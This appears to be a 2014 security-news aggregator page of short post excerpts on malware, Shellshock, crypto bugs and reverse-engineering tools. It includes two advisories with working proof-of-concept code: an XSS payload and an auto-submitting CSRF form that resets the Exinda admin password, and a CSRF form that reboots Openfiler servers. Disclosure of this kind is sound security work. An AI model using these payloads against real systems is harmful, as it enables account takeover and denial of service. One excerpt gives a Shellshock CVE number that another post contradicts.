Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Scammers Offer Up “Steam Wallet Codes”

September 26, 2014, 9:18 am
$
0
0
Last week, we presented a list of online threats that users may encounter while on Steam and interacting with other gamers within the platform. As you may also know, there are threats that can be found outside of Steam that targets and affects its users worldwide. Some of these threats have been discussed in the following Malwarebytes posts:

Buyer Beware: Steam Keys and What You Should Know
Search Engine Adverts: Download All The Things?
We recently found a fake online hacking tool catering to Steam users, the likes of which I’ve already seen in the past


more here.............https://blog.malwarebytes.org/fraud-scam/2014/09/scammers-offer-up-steam-wallet-codes/
Search

Android-InsecureBankv

September 26, 2014, 9:36 am
$
0
0
This is a major update to one of my previous projects - "InsecureBank". This vulnerable Android application is named "InsecureBankv2" and is made for security enthusiasts and developers to learn the Android insecurities by testing this vulnerable application. Its back-end server component is written in python. The client component i.e. the Android InsecureBank.apk can be downloaded along with the source code.


more here.............https://github.com/dineshshetty/Android-InsecureBankv2

Fileless Infections from Exploit Kit: An Overview

September 26, 2014, 12:19 pm
$
0
0
The exploit kit landscape is constantly changing and forcing security researchers to up their game.

There was a time when payloads were not even encrypted and web servers actually not lying.

Unique patterns, packets that match the size of binaries on disk, all make things easier for the good guys to detect and block malicious activity. But the reality is this was just an adaptive phase when the bad guys did not need to spend any extra effort and still got what they wanted: high numbers of infections.


more here............https://blog.malwarebytes.org/exploits-2/2014/09/fileless-infections-from-exploit-kit-an-overview/

Script to decrypt des26 passwords used by ITS (Internet Transaction Server)

September 26, 2014, 2:26 pm
$
0
0
Decrypt des26 encrypted SAP ITS passwords here..............http://www.synacktiv.fr/ressources/SAP_ITS_des26_decrypt.py

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite (CVE-2014-7157, CVE-2014-7158)

September 27, 2014, 2:51 am
$
0
0
I. VULNERABILITY

-------------------------

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite

II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:

III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa"><script>alert("Exinda XSS")</script>

POC CSRF
  <html>

<body onload="CSRF.submit();">

<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>

<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>

<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>

</body>
</html>

 Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300

POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd

V. BUSINESS IMPACT -------------------------

Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.

VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)

VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf

Authored by William Costa

Pillars of Application Security

September 27, 2014, 3:05 am
$
0
0
The hardest part of any good building project is laying a foundation and understanding what that foundation means. If you lay a square foundation, but attempting to build a triangular building well sure the foundation can support the building, but the foundation is either going to be to big or two small both have inherent issues. Defining the pillars of an App Security Program is much like laying the foundation. What do the pillars require? How many different ways do they need to support the app security program? Do I want a few big pillars from a high level or a few small narrowly scoped pillars?

more here...........http://security.howellsonline.ca/app-security-program-pillars/

Openfiler DoS via CSRF (CVE-2014-7190)

September 27, 2014, 7:22 am
$
0
0
# Exploit author: @dolevff
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1 (latest)
# Alerted vendor: 7.5.14
# CVE-2014-7190


Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
   Vulnerability Description
=========================
it is possible to restart/shutdown a server running openfiler due to missing session tokens and cause a denial of service attack.

proof of concept:
=========================
<html>
<div align="center">
<pre>
<h2><b>DoS<b></h2>
<body>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="attack" />
        </form>
        </body>
</div>
</html>



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Shell Shock Exploitation Vectors

September 27, 2014, 11:36 am
$
0
0
This is an incomplete catalog of potential exploitation vectors for CVE-2014-6721, or “Shell Shock”. I’m posting this hastily and will update it continuously with new findings. Please leave a comment if you can think of any vectors not listed here.

For a service to be vulnerable to Shell Shock, three conditions must be met:

It must set an environment variable whose value (not necessarily name) is attacker-controlled, and particularly must be made to begin with () {.
It must invoke bash.
The system must be running a vulnerable version of bash.


more here............https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html
Search

Are You an Entrepreneur Looking For Capital?

September 27, 2014, 2:49 pm
$
0
0
Besides being a info security enthusiast I also look for projects or businesses to infuse my personal capital into. Specifically for unique opportunities from determined hungry individuals and entities alike. Typically when I look at a public company there are certain variables I pay particularly close attention to. That is income to debt ratios, trailing and forward multiples, top line growth, bottom line growth and the lists goes on. However here I'm open to you all. Hopefully you have a business prospectus or executive summary but its not essential. If this sounds like you than contact me through Google plus and we can talk further.


Regards

Bradley Susser

PKCS#1 signature validation

September 28, 2014, 3:14 am
$
0
0
On Wednesday, Chrome and Mozilla did coordinated updates to fix an RSA signature verification bug in NSS - the crypto library that handles SSL in Firefox and (currently) Chrome on most platforms. The updates should be well spread now and the bug has been detailed on Reddit, so I think it's safe to talk about.

(Hilariously, on the same day, bash turned out to have a little security issue and so hardly anyone noticed the NSS one!)

more here.............https://www.imperialviolet.org/2014/09/26/pkcs1.html

Malvertising on The Pirate Bay

September 28, 2014, 3:16 am
$
0
0
The Pirate Bay is famous for its tumultuous relationship with copyright advocates and law enforcement. And yet, despite police raids and numerous trials, the torrent site is still going strong with a new infrastructure, as detailed in a recent article published by Torrent Freak.

From a security standpoint, The Pirate Bay has been involved in notorious malvertising attacks, most likely resulting in a large number of infections given the site’s high traffic. BlueCoat and Malekal blogged about this before and what we caught in our honeypots today is not in fact all that different.

more here............https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-on-the-pirate-bay/

Bash bug: so, like, apply the unofficial patch now (CVE-2014-6277)

September 28, 2014, 3:19 am
$
0
0
OK, rebuild bash and deploy Florian's unofficial patch now. If you're a distro maintainer, please consider doing the same.
My previous post has more information about the original vulnerability (CVE-2014-6271). It also explains Tavis' and my original negative sentiment toward the original upstream patch. In short, the revised code did not stop bash from parsing the code seen in potentially attacker-controlled, remotely-originating environmental variables. Instead, the fix simply seeks to harden the parsing to prevent RCE. It relies on two risky assumptions

more here.............http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html

Thinking outside the sandbox

September 28, 2014, 7:57 am
$
0
0
Attacking the modern browser and its plug-ins is becoming harder as vendors employ numerous
mitigation technologies to increase the cost of exploit development. An attacker is now forced to
uncover multiple vulnerabilities to gain privileged-level code execution on his targets. First, an
attacker needs to find a vulnerability, leak an address to get around ASLR, and bypass DEP to gain
code execution within the renderer process. The attacker then needs to bypass the application
sandbox to elevate their privileges, which will allow them to execute malicious code. Our journey
begins at the sandbox and investigates some of the more obscure techniques used to violate this
trust boundary.


more here............http://h30499.www3.hp.com/hpeb/attachments/hpeb/off-by-on-software-security-blog/414/1/HPSR%20SecurityBriefing_Episode17_sandboxbypass.pdf

Solving FireEye's Flare On Six via Side Channels

September 28, 2014, 10:36 am
$
0
0
This summer FireEye put out a series of seven reverse engineering challenges called the Flare On Challenge. The challenges all have a malware theme to them as it was presumably an avenue of recruiting for the team. A friend brought Flare On to my attention so I decided to register and give it a go once it went live. I played when I could find some free time outside my internship and ended up squeezing onto the honor roll, finishing in ~2.5 days.

A lot of people choked on level six in the series and looking at the released statistics, ~42% of the people that made it to level six did not solve it. The biggest drop rate for any of the Flare On levels. There have been two or three eager write-ups released for level six so far, but the methods I've seen involved tedious amounts of stepping through the spaghetti monster or a lot of deobfuscation + reversing. I did it pretty differently and figured some of the late solvers might appreciate how myself (and probably a few others) cut through this challenge so quickly.



more here...............http://gaasedelen.blogspot.com/2014/09/solving-fireeyes-flare-on-six-via-side.html

Mining Bitcoin with pencil and paper: 0.67 hashes per day

September 28, 2014, 10:41 am
$
0
0
I decided to see how practical it would be to mine Bitcoin with pencil and paper. It turns out that the SHA-256 algorithm used for mining is pretty simple and can in fact be done by hand. Not surprisingly, the process is extremely slow compared to hardware mining and is entirely impractical. But performing the algorithm manually is a good way to understand exactly how it works.

more here..........http://www.righto.com/2014/09/mining-bitcoin-with-pencil-and-paper.html
Search

Volatility autoruns plugin

September 28, 2014, 3:11 pm
$
0
0
Finding persistence points (also called "Auto-Start Extensibility Points", or ASEPs) is a recurring task of any investigation potentially involving malware.

To make an analyst's life a bit easier, I came up with the autoruns plugin. autoruns basically automates most of the tasks you would need to run when trying to find out where malware is persisting from. Once all the autostart locations are found, they are matched with running processes in memory.

more here...........https://github.com/tomchop/volatility-autoruns/

Solving IOLI-crackme with Dynamic Binary Modification and GDB

September 28, 2014, 4:02 pm
$
0
0
I don't commonly see Dynamic Binary Modification (DBM) being used for reverse engineering and binary patching, which is a shame since it's quite a good tool for this sort of thing. Compared to regular binary patching, it has the advantage that the executable remains unmodified on disk and appears unmodified in memory at runtime.

more here...............https://github.com/lgeek/ioli_crackme_dbm_solution

Predictive Research: Malware, You're Doing It Wrong

September 29, 2014, 3:02 am
$
0
0
I sat down this weekend to document the inspiring thoughts behind a talk I gave at Next Generation Threats last week in Stockholm. The initial idea was to outline how today's threat detection systems work and how they are bound to fail in specific situations.

more here...........http://0x1338.blogspot.co.at/2014/09/predictive-research-malware-youre-doing.html

A BRIEF ANALYSIS OF AN SMS SPAM CAMPAIGN

September 29, 2014, 3:03 am
$
0
0
A few days ago I got a message from a friend asking if I could investigate a message he had gotten by SMS about possibly having won 10 000 SEK at Swedish supermarket chain ICA. I said “sure, why not” and spent a few hours digging around. As it turns out, the message in question was nothing more than a spam campaign trying to get people to fill out a survey and thereby give out their email addresses and sign up for different “offers”, but there were some parts about it that triggered my curiosity so I thought I’d do a brief write-up. Please note that this was done during a pretty busy weekend, so you’ll have to forgive my somewhat high level analysis.

more here............https://3vildata.com/?p=1159

Update: XORSearch With Shellcode Detector

September 29, 2014, 3:05 am
$
0
0
XORSearch allows you to search for strings and embedded PE-files brute-forcing different encodings. Now I added shellcode detection.

This new version of XORSearch integrates Frank Boldewin’s shellcode detector.


more here............http://blog.didierstevens.com/2014/09/29/update-xorsearch-with-shellcode-detector/
Viewing all 8064 articles
Browse latest View live
Search